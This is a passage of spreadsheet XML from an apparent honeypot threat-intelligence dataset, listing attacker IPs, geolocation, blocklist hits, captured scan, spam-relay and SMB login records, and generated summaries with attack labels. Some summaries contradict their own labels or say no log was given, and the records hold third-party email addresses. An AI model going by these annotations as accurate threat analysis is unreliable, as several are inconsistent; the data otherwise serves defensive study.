'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}</t>
  </si>
  <si>
    <t>::ffff:b9b4:8c69</t>
  </si>
  <si>
    <t>1fa203dc1ecc336cce342d7e660dda2e</t>
  </si>
  <si>
    <t>114.134.20.131</t>
  </si>
  <si>
    <t>59162</t>
  </si>
  <si>
    <t>UPCSPL-AS-IN</t>
  </si>
  <si>
    <t>U.p. Communication Services Pvt Ltd</t>
  </si>
  <si>
    <t>Waves NET Solutions</t>
  </si>
  <si>
    <t>::ffff:7286:1483</t>
  </si>
  <si>
    <t>No Telnet activity detected, possibly indicating malicious actors bypassing this service or avoiding detection through it. This lack of activity could be due to the system being configured to ignore or block all Telnet traffic by default. No additional information can be inferred from the log data as it only contains a "NA" value for Telnet logs. &amp;&amp; No recent TELNET activity detected, possibly indicating a lack of exploitation attempts against this service. No suspicious connections were found, which could be a good sign for security. This could indicate that the attackers have moved on to other targets.</t>
  </si>
  <si>
    <t>Telnet Scan &amp;&amp; Telnet Brute</t>
  </si>
  <si>
    <t>98983fcc8d5e4f48122a20a89da1762b</t>
  </si>
  <si>
    <t>113.53.126.241</t>
  </si>
  <si>
    <t>node-p2p.pool-113-53.dynamic.nt-isp.net</t>
  </si>
  <si>
    <t>Pathum Wan</t>
  </si>
  <si>
    <t>7026842</t>
  </si>
  <si>
    <t>10330</t>
  </si>
  <si>
    <t>13.7365</t>
  </si>
  <si>
    <t>100.524</t>
  </si>
  <si>
    <t>::ffff:7135:7ef1</t>
  </si>
  <si>
    <t>e5718c4624cb2ead508591ef8d7c6c5e</t>
  </si>
  <si>
    <t>59.98.28.252</t>
  </si>
  <si>
    <t>::ffff:3b62:1cfc</t>
  </si>
  <si>
    <t>7e105494e825b0a09e3ccbc682cb6668</t>
  </si>
  <si>
    <t>112.164.4.52</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H6&amp;&amp;SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_SMTP_H25&amp;&amp;SMA-LAB_SMTP_H27&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_SMTP_H16&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_SMTP_H7&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMTP_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;22&amp;&amp;51201&amp;&amp;5900&amp;&amp;38798</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'spam'&amp;&amp; 'unknown']}</t>
  </si>
  <si>
    <t>Naju</t>
  </si>
  <si>
    <t>35.0292</t>
  </si>
  <si>
    <t>126.717</t>
  </si>
  <si>
    <t>2009-02-10</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;farzad.razavi@qiau.ac.ir&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;larry@sisaz.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;benkosi2002@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mariadavid_100@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;obifrank2005@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;stephenbrown1973@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;kevin@palmgarden.com.tw&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;stemaj48@lineone.net&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;jennifer.slaunwhite@wcb.ns.ca&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;kyonggon.choi@daishin.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;elmalah@netvision.net.il&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;karen.webber@wcb.gov.ns.ca&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;jeffrey@taroko-int.com.tw&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;chenzo@smandes.com.ar&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@iopfund.com&gt;', 'command': 'MAIL', 'data': 'None'}}</t>
  </si>
  <si>
    <t>::ffff:70a4:434</t>
  </si>
  <si>
    <t>This data indicates that an attacker attempted to send emails from the monitored system, but the RSET command was used which may be a malicious attempt to reset the SMTP connection for potential future spam or phishing activities. This could be a tactic to evade detection and clear logs of previous email transmissions. It suggests a possible attempt to misuse the system's email service. &amp;&amp; An email is being sent from an unknown source with the sender address info@iopfund.com, attempting to send a message. This could be a spam or phishing attempt. The lack of recipient information makes it unclear who the target is. &amp;&amp; The data suggests an attacker is attempting to reset a message queue, possibly as part of spamming or phishing attempts. This action could be a reconnaissance step before sending malicious emails. The attacker may be trying to flush existing messages. &amp;&amp; This log suggests an attempt to reset a SMTP session, possibly a scan for vulnerable email servers or an initial step in sending spam emails. The action is likely part of a larger malicious activity targeting email infrastructure. It may be an automated probe by a botnet or other malicious software.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Phishing Spam</t>
  </si>
  <si>
    <t>1fdfb5b028f91033f87d8da6993c058d</t>
  </si>
  <si>
    <t>117.194.65.207</t>
  </si>
  <si>
    <t>::ffff:75c2:41cf</t>
  </si>
  <si>
    <t>No activity detected via Telnet, but may indicate potential reconnaissance or probing attempts to find open ports. No actual malicious data transfer occurred during this time period. This could be a sign of initial scanning before more targeted attacks. &amp;&amp; No activity detected, TELNET service not accessed recently but still available. No malicious attempts logged for this service so far. Data indicates normal operation with no suspicious behavior.</t>
  </si>
  <si>
    <t>Port Scan
Telnet Brute Force &amp;&amp; Brute Force</t>
  </si>
  <si>
    <t>bc7ab0176d96106cd0406c2aa74eb034</t>
  </si>
  <si>
    <t>83.1.243.138</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;45474&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>Tpnet Polaczenia DLA Klient ATM</t>
  </si>
  <si>
    <t>2003-12-03</t>
  </si>
  <si>
    <t>login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '66.94.127.183:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:5301:f38a</t>
  </si>
  <si>
    <t>No suspicious TELNET activity detected.
TELNET connections are typically used for remote access, but this entry indicates no attempts were made.
The presence of 'NA' (not available) suggests that the service was not accessed or interacted with in any way during the monitoring period.</t>
  </si>
  <si>
    <t>e1dc0757437f67392463b0b96b98841f</t>
  </si>
  <si>
    <t>147.185.133.13</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_MT-CPA_H43</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;53267&amp;&amp;22&amp;&amp;36754&amp;&amp;50160&amp;&amp;110&amp;&amp;53685&amp;&amp;55988&amp;&amp;52347&amp;&amp;56451&amp;&amp;25&amp;&amp;49627&amp;&amp;52811&amp;&amp;50206&amp;&amp;443&amp;&amp;6667</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_SMTP:{'arg': '94.131.113.33:25', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'Expanse,', 'command': 'USER-AGENT:', 'data': 'a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com'}}&amp;&amp;{Data_SMTP:{'arg': 'gzip', 'command': 'ACCEPT-ENCODING:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': '', 'data': 'None'}}&amp;&amp;{Data_IRC:NA}</t>
  </si>
  <si>
    <t>::ffff:93b9:850d</t>
  </si>
  <si>
    <t>a634a2da4dd6251f9168af72646b911d</t>
  </si>
  <si>
    <t>45.113.91.111</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;13460&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}</t>
  </si>
  <si>
    <t>Dinajpur Uttar</t>
  </si>
  <si>
    <t>Kāliyāganj</t>
  </si>
  <si>
    <t>1268383</t>
  </si>
  <si>
    <t>25.6344</t>
  </si>
  <si>
    <t>88.3267</t>
  </si>
  <si>
    <t>58765</t>
  </si>
  <si>
    <t>B TEL INTERNET PRIVATE LIMITED</t>
  </si>
  <si>
    <t>REGENT</t>
  </si>
  <si>
    <t>Regent Park Broadband And Allied Services Pvt Ltd</t>
  </si>
  <si>
    <t>2015-03-17</t>
  </si>
  <si>
    <t>REGENT-IN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,61613)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,61649)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,56044)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,56115)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,52984)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,53759)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,53831)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,56698)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,50199)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,50295)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,54659)}&amp;&amp;{Data_SMB:Incoming connection (45.113.91.111,54751)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:2d71:5b6f</t>
  </si>
  <si>
    <t>SMB Scanning &amp;&amp; SMB Brute</t>
  </si>
  <si>
    <t>abb61a04ded57693bebdd292c1098989</t>
  </si>
  <si>
    <t>59.127.129.37</t>
  </si>
  <si>
    <t>59-127-129-37.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;56993&amp;&amp;80&amp;&amp;23&amp;&amp;14724&amp;&amp;37027&amp;&amp;9100&amp;&amp;50981&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7f:8125</t>
  </si>
  <si>
    <t>f5ef3bd2804f2a994a64c97e1c773fba</t>
  </si>
  <si>
    <t>114.32.168.119</t>
  </si>
  <si>
    <t>114-32-168-119.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;17127&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7220:a877</t>
  </si>
  <si>
    <t>91dceb9df7699d5aa98412becb6ee0e1</t>
  </si>
  <si>
    <t>103.165.118.181</t>
  </si>
  <si>
    <t>SMA-LAB_LDAP_HC1</t>
  </si>
  <si>
    <t>389</t>
  </si>
  <si>
    <t>18.9894</t>
  </si>
  <si>
    <t>73.1175</t>
  </si>
  <si>
    <t>132335</t>
  </si>
  <si>
    <t>LEAPSWITCH-IN-AS-AP</t>
  </si>
  <si>
    <t>Keep Secure Cloud Services PVT LTD</t>
  </si>
  <si>
    <t>{Data_LDAP:NA}</t>
  </si>
  <si>
    <t>::ffff:67a5:76b5</t>
  </si>
  <si>
    <t>This log indicates an attempt to access LDAP services without providing any valid data, potentially indicating an unauthorized access attempt or a brute-force attack. The attacker is trying to exploit the service by sending invalid credentials. No valid authentication data was provided. &amp;&amp; Unknown activity detected, possibly related to an attempt to access or exploit the LDAP service.
This could be a reconnaissance phase of a larger attack.
The exact nature and intent are unclear without further investigation.</t>
  </si>
  <si>
    <t>LDAP Brute &amp;&amp; LDAP scan</t>
  </si>
  <si>
    <t>b97d3d3f59768305c71ba41854908c15</t>
  </si>
  <si>
    <t>117.221.156.13</t>
  </si>
  <si>
    <t>Thrissur</t>
  </si>
  <si>
    <t>1254187</t>
  </si>
  <si>
    <t>680001</t>
  </si>
  <si>
    <t>10.5276</t>
  </si>
  <si>
    <t>76.2144</t>
  </si>
  <si>
    <t>::ffff:75dd:9c0d</t>
  </si>
  <si>
    <t>This indicates that there was an unsuccessful attempt to connect to the telnet service, likely a scanning activity or reconnaissance effort by malicious actors to identify open ports and services. The lack of successful connection suggests the target may have implemented security measures. A potential attack vector has been probed. &amp;&amp; The log data suggests that there is an attempt to initiate TELNET connections, which could indicate scanning or reconnaissance activities from potential attackers trying to exploit vulnerabilities. This may be the first step in launching a malicious attack on the system. It's likely a probing activity.</t>
  </si>
  <si>
    <t>Telnet Attack &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>bed75e577b909a82c2a1ba6e6be7b6c4</t>
  </si>
  <si>
    <t>120.61.120.219</t>
  </si>
  <si>
    <t>::ffff:783d:78db</t>
  </si>
  <si>
    <t>No connection established via TELNET service. Malicious activity possible if no connection was made as expected. Indicates potential unauthorized access attempt or scan. &amp;&amp; No malicious activity detected, connection attempt was made to a service that is either closed or being monitored. The service may be dormant or not configured for Telnet connections. Connection attempt was met with no response.</t>
  </si>
  <si>
    <t>Port Scanning &amp;&amp; Telnet Brute</t>
  </si>
  <si>
    <t>32f29cfb23adb53c315b83bee210ee0b</t>
  </si>
  <si>
    <t>202.83.19.155</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1256&amp;&amp;3306&amp;&amp;1433&amp;&amp;5805</t>
  </si>
  <si>
    <t>{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,58350)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,58744)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,53609)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,53988)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,58089)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,55641)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,56687)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,51233)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,51872)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,54989)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.155,55416)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:ca53:139b</t>
  </si>
  <si>
    <t>b9e7054dd3f319a8398e71e89c43b8a4</t>
  </si>
  <si>
    <t>122.166.121.133</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;8878&amp;&amp;1433&amp;&amp;445&amp;&amp;10771&amp;&amp;10772&amp;&amp;7332&amp;&amp;7622&amp;&amp;4039&amp;&amp;4040</t>
  </si>
  <si>
    <t>UL_MANAGEMENT SYSTEM</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.166.121.133,15484)}&amp;&amp;{Data_SMB:Incoming connection (122.166.121.133,15710)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.166.121.133,6934)}&amp;&amp;{Data_SMB:Incoming connection (122.166.121.133,14074)}</t>
  </si>
  <si>
    <t>::ffff:7aa6:7985</t>
  </si>
  <si>
    <t>There is no log data provided, making it impossible to analyze or describe any possible malicious activity.</t>
  </si>
  <si>
    <t>There is no log data provided. Please share the actual log data for analysis.</t>
  </si>
  <si>
    <t>9833adc0ca5b73031f69140d0aed02e8</t>
  </si>
  <si>
    <t>220.141.226.137</t>
  </si>
  <si>
    <t>220-141-226-137.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:dc8d:e289</t>
  </si>
  <si>
    <t>c38ddc91a1ed826719df2ae9398375db</t>
  </si>
  <si>
    <t>103.30.65.187</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_SMB_H20&amp;&amp;SMA-LAB_SMB_H10</t>
  </si>
  <si>
    <t>1433&amp;&amp;15919&amp;&amp;445</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,52859)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,54260)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,7225)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,62660)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,63665)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,18520)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,42357)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,42678)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,45831)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,61559)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,61621)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,62980)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,45845)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,45934)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection 